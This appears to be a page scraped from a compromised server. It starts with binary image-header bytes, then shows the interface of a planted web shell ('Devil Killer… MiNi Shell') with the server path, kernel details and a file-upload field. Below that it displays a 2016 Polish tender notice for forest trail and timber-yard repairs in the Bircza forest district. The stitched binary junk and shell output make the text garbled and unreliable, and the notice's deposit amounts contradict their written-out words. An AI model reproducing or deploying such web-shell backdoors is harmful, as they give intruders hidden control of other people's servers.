JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160418/94998-N-2016.html

<p class="kh_header"><b>Bircza: Naprawa zjazdów ze szlaków zrywkowych i skład drewna oraz naprawa szlaków zrywkowych  w Nadleśnictwie Bircza w 2016 r. w leśnictwach Jureczkowa, Wojtkówka, Arłamów, Trzcianiec, Kuźmina, Łodzinka i Turnica</b><br>
<b>Numer ogłoszenia: 94998 - 2016; data zamieszczenia: 18.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bircza , Stara Bircza 99, 37-740 Bircza, woj. podkarpackie, tel. 16 65 22 280, faks 16 65 22 281.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa zjazdów ze szlaków zrywkowych i skład drewna oraz naprawa szlaków zrywkowych  w Nadleśnictwie Bircza w 2016 r. w leśnictwach Jureczkowa, Wojtkówka, Arłamów, Trzcianiec, Kuźmina, Łodzinka i Turnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane oraz usługi leśne polegające na naprawach zjazdów na szlaki zrywkowe i na skład drewna oraz szlaków zrywkowych. 
Zakres prac obejmuje m.in.:
Część zamówienia nr 1: Naprawa zjazdów ze szlaków zrywkowych i na skład drewna oraz naprawa szlaku zrywkowego w leśnictwie Turnica, Łodzinka, Kuźmina i Trzcianiec
Zadanie I: Naprawa szlaku zrywkowego w leśnictwie Trzcianiec oddz. 229
1. Wykonanie wykopów spycharką.
2. Wykonanie nasypu spycharką. 
3. Przemieszczenie urobku do wbudowania. 
4. Wykonanie sączka z drewna odpadowego - leżaniny.
5. Profilowanie powierzchni szlaku spycharką.
6. Karczowanie pni drzew.
7. Odkrzaczenie powierzchni szlaku
8. Uporządkowanie terenu robót
Zadanie II: Naprawa zjazdów ze szlaków zrywkowych i na skład drewna w leśnictwie Kuźmina oddz. 268b
1. Rozebranie istniejącej nawierzchni z płyt drogowych.
2. Wykonanie koryta pod nawierzchnię z płyt.
3. Wykonanie koryta pod wodościek.
4. Profilowanie i zagęszczenie podłoża.
5. Ułożenie wodościeków na podbudowie z betonu. 
6. Ułożenie nawierzchni z płyt drogowych. 
7. Wykonanie utwardzenia pobocza.
8. Profilowanie i zagęszczenie powierzchni składu.
9. Wykonanie rowów odpływowych.
10. Przemieszczenie urobku z wykopów i humusu poza obręb prac oraz rozplantowanie.
11. Uporządkowanie terenu robót.
Zadania III: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Łodzinka oddz. 165n
1. Wykonanie koryta pod nawierzchnię- 171 m2
2. Profilowanie i zagęszczenie podłoża -171 m2
3. Wykonanie warstwy odcinającej z pospółki - 171 m2
4. Ułożenie nawierzchni z płyt drogowych - 171 m2
5.  Odmulenie rowów przydrożnych - 18 m3
6.  Rozebranie nawierzchni z płyt drogowych - 27 m2
7. Uporządkowanie terenu robót
Zadanie IV: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Turnica oddz. 141a
1. Wykonanie koryta pod nawierzchnię- 132m2
2. Profilowanie i zagęszczenie podłoża -132 m2 
3. Wykonanie warstwy odcinającej z pospółki - 132 m2
4. Ułożenie płyt drogowych - 132 m2 
6. Profilowanie powierzchni składu - 1200 m2
7. Karczowanie pni - 8 szt.
8. Uporządkowanie terenu robót
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiąca załącznik 1a do SIWZ
Część zamówienia nr 2: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Arłamów
Zadanie I: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Arłamów oddział 138a
1. Wykonanie koryta pod nawierzchnię- 159 m2
2. Profilowanie i zagęszczenie podłoża -159 m2 
3. Wykonanie warstwy odcinającej z pospółki - 159 m2
4. Ułożenie płyt drogowych - 159 m2 
6. Profilowanie powierzchni składu - 1200 m2
7. Karczowanie pni - 18 szt.
8. Uporządkowanie terenu robót.
Zadanie II: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Arłamów oddział 153b
1. Wykonanie koryta pod nawierzchnię- 150 m2
2. Profilowanie i zagęszczenie podłoża -150 m2 
3. Wykonanie warstwy odcinającej z pospółki - 150 m2
4. Ułożenie płyt drogowych - 150 m2 
6. Profilowanie powierzchni składu - 1200 m2
7. Karczowanie pni - 29 szt.
8.  Formowanie i zagęszczanie nasypów - 450 m3
9.  Wykopy  z transportem materiału  - 770 m3
10.  Przedłużenie przepustu z rur O 50 cm  - 3 mb
11.  Wykonanie rowów odcinających - 44 m3
12.  Uporządkowanie terenu robót.
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiące załącznik 1b do SIWZ.
Część zamówienia nr 3: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Wojtkówka i Jureczkowa
Zadanie I: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Wojtkówka oddział 132a leśnictwie Jureczkowa oddz. 179a
1. Usunięcie warstwy humusu na gł. 15.0cm.
2. Wykonanie nasypu na istniejącym rowie pod nawierzchnię z płyt.
3. Dowiezienie gruntu do nasypów.
4. Profilowanie i zagęszczenie podłoża.
5. Ułożenie nawierzchni z płyt drogowych. 
6. Wykonanie utwardzenia pobocza.
7. Wykonanie rowu odpływowego.
8. Karczowanie pni.
9. Uporządkowanie terenu robót.
Zadanie II: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Wojtkówka oddz. 73b
1. Wykonanie koryta pod nawierzchnię- 420 m2
2. Profilowanie i zagęszczenie podłoża -420 m2
3. Wykonanie warstwy odcinającej z pospółki - 420 m2
4. Ułożenie nawierzchni z płyt drogowych - 420 m2
5. Uporządkowanie terenu robót
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiące załącznik 1c do SIWZ.
Część zamówienia nr 4: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Jureczkowa
Zadanie I: Naprawa zjazdów ze szlaków zrywkowych w leśnictwie Jureczkowa oddz. 172a
1. Wykonanie koryta pod nawierzchnię- 162 m2
2. Profilowanie i zagęszczenie podłoża -162 m2
3. Wykonanie warstwy odcinającej z pospółki - 162 m2
4. Ułożenie nawierzchni z płyt drogowych - 162 m2
5. Wykonanie ław fundamentowych pod przepusty - 1,20 m3
6. Ułożenie przepustu pod zjazdem - 6 m
7.  Rozebranie i wbudowanie ścianek czołowych przepustów - 1 szt.
8. Zasypanie przepustów kruszywem - 4,82 m3
9. Profilowanie i zagęszczanie powierzchni  składu - 1000 m2
10. Karczowanie pni drzew - 32 szt.
11. Uporządkowanie terenu robót.
Zadanie II: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Jureczkowa oddz. 176b
1. Wykonanie koryta pod nawierzchnię- 162 m2
2. Profilowanie i zagęszczenie podłoża -162 m2
3. Wykonanie warstwy odcinającej z pospółki - 162 m2
4. Ułożenie nawierzchni z płyt drogowych - 162 m2
5. Wykonanie ław fundamentowych pod przepusty - 2,80 m3
6. Ułożenie przepustu pod zjazdem - 14 m
7.  Ścianki czołowe przepustu - 2 szt.
8. Zasypanie przepustów kruszywem - 11,25 m3
9. Profilowanie i zagęszczanie powierzchni  składu - 1000 m2
10. Karczowanie pni drzew - 35 szt.
11. Uporządkowanie terenu robót
Zadanie III: Naprawa zjazdów ze szlaków zrywkowych w Leśnictwie Jureczkowa oddz. 177b
1. Ułożenie nawierzchni z płyt drogowych - 9 m2
5. Wykonanie ław fundamentowych pod przepusty - 0,6 m3
6. Ułożenie przepustu pod zjazdem - 3 m
7.  Rozebranie i wbudowanie ścianki czołowej przepustu - 1 szt.
8. Zasypanie przepustów kruszywem - 2,40 m3
Szczegółowy opis zamówienia zawiera dokumentacja projektowa stanowiące załącznik 1d do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający informuje, iż przewiduje zgodnie z art. 67 ust. 1 pkt. 6 Ustawy, możliwość udzielenia w okresie 3 lat od udzielenia niniejszego zamówienia, zamówień uzupełniających polegających na powtórzeniu robót budowlanych i usług związanych z naprawą zjazdów na składy i szlaków zrywkowych będących przedmiotem zamówienia lub rozszerzeniu zakresu prac o wartości nieprzekraczającej 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 77.20.00.00-2, 45.11.27.00-2, 45.23.32.50-6, 45.11.22.10-0, 14.21.00.00-6, 44.16.31.00-1, 44.17.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości określonej niżej dla poszczególnych części zamówienia:
dla części I		w wysokości 2 500,00 zł (słownie: dwa tysiące złotych)
dla części II	w wysokości 3 000,00 zł (słownie: trzy tysiące złotych)
dla części III       w wysokości  3 000,00 zł (słownie: trzy tysiące złotych)
dla części III       w wysokości  2 800,00 zł (słownie: dwa tysiące osiemset złotych)
  - w przypadku składania oferty na więcej niż jedną część zamówienia na kwotę będącą sumą poszczególnych kwot wadium na każdą z części zamówienia. 
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1) 	pieniądzu,
2) 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) 	gwarancjach bankowych,
4) 	gwarancjach ubezpieczeniowych,
5) 	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz. U. z 2007 r. Nr 42, poz.275 z późniejszymi zmianami).
3. 	Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego w banku BGŻ O Przemyśl nr rachunku: 11 2030 0045 1110 0000 0090 8700 z dopiskiem: wadium w postępowaniu na Naprawa zjazdów ze szlaków zrywkowych i skład drewna oraz naprawa szlaków zrywkowych  w Nadleśnictwie Bircza w 2016 r. w leśnictwach Jureczkowa, Wojtkówka, Arłamów, Trzcianiec, Kuźmina, Łodzinka i Turnica, część.....
Wadium wnoszone w formie niepieniężnej należy złożyć w formie oryginału gwarancji lub poręczenia w kasie Zamawiającego. Dopuszcza się także dołączenie oryginału poręczenia lub gwarancji do oferty - w takim przypadku Zamawiający dokona jego wyodrębnienia po otwarciu oferty i zdeponowania w kasie
4. 	Z treści wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz art. 46 ust. 5 PZP. 
5. 	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta (Poręczyciela). Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (Poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji (poręczenia) winno wynikać bezwarunkowe zobowiązanie Gwaranta (Poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4 a i ust. 5 Ustawy, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą. W przypadku wadium wniesionego w formie niepieniężnej wymagane jest aby termin ważności gwarancji (poręczenia) zapłaty wadium nie był krótszy niż termin związania ofertą.
6. 	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia  05.05.2016 r., do godz. 1200.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się ono na rachunku bankowym Zamawiającego.
7. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty  najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem punktu 6. c 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
8.  Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.  Wadium Wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
c)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, lub informacji o tym , że nie należy do grupy kapitałowej, lub nie wyrazi zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowałoby brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejsza</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnione warunki udziału w postępowaniu, jeżeli Wykonawca wykaże, iż posiada polisę - ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną kwotę: 
a) dla części zamówienia nr 1 - 50 000,00 zł (pięćdziesiąt tysięcy zł)
b) dla części zamówienia nr 2 - 50 000,00 zł (pięćdziesiąt tysięcy zł)
c) dla części zamówienia nr 3 - 50 000,00 zł (pięćdziesiąt tysięcy zł)
d) dla części zamówienia nr 4 - 50 000,00 zł (pięćdziesiąt tysięcy zł)
e) w przypadku składania oferty na więcej niż jedną część zamówienia na minimalną kwotę ubezpieczenia będącą sumą poszczególnych kwot polisy na każdą z części zamówienia.
oraz złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy.
W przypadku braku polisy, Wykonawca przedstawi inny dokument potwierdzający, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia. W przypadku, gdy dokumenty złożone przez Wykonawcę, w celu potwierdzenia posiadania ubezpieczenia od odpowiedzialności cywilnej, zawierają dane określone w innych walutach niż określone w SIWZ, Zamawiający dokona ich przeliczenia wg średniego kursu NBP obowiązującego (publikowanego) na dzień wystawienia dokumentu potwierdzającego posiadanie ubezpieczenia. 
Tabela kursów walut na stronie internetowej http://www.nbp.pl/kursy/kursy.html
Wykonawcy występujący jako konsorcjum składają wspólną polisę na wymaganą kwotę albo oddzielne polisy dla każdego z członków konsorcjum, z zastrzeżeniem, że suma ubezpieczenia członków konsorcjum wynosi nie mniej niż 50 000,00 złotych na jedną część zamówienia, w przypadku składania oferty na więcej niż jedną część zamówienia na minimalną kwotę będącą sumą poszczególnych kwot polisy na każdą z części zamówienia. Ocena warunku na podstawie informacji i danych zawartych w dokumentach, o których mowa w pkt. IX SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać ponadto następujące dokumenty i oświadczenia:
a)	Pełnomocnictwo do złożenia oferty, o ile nie wynika ono z innych dokumentów załączonych do oferty, a także pełnomocnictwo podmiotów występujących wspólnie (konsorcjum), jeśli dotyczy.
b)	Wypełniony formularz ofertowy zgodny w treści z wzorem - załącznikiem nr 2a do SIWZ.
UWAGA: Zamawiający żąda podania w formularzu ofertowym informacji o przynależności (lub jej braku) Wykonawców do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Ustawy. Wykonawca należący do grupy kapitałowej, dołącza do oferty listę podmiotów należących do tej samej grupy kapitałowej zgodnie z dołączonym do formularza wzorem.
c)	Wypełniony kosztorys ofertowy zgodny w treści z wzorem - załącznikiem nr 2b, 2c, 2d, 2e do SIWZ; Nie dopuszcza się składania kosztorysu uproszczonego wykonanego w programie kosztorysującym. 
d)	Wykaz robót, które Wykonawca zamierza zlecić do wykonania podwykonawcom zgodny w treści z wzorem stanowiącym załącznik nr 4 do SIWZ.
 UWAGA: Brak  w/w dokumentu nie wpływa na ocenę oferty i potraktowany  zostanie jako oświadczenie, iż Wykonawca wykona przedmiot umowy bez udziału podwykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
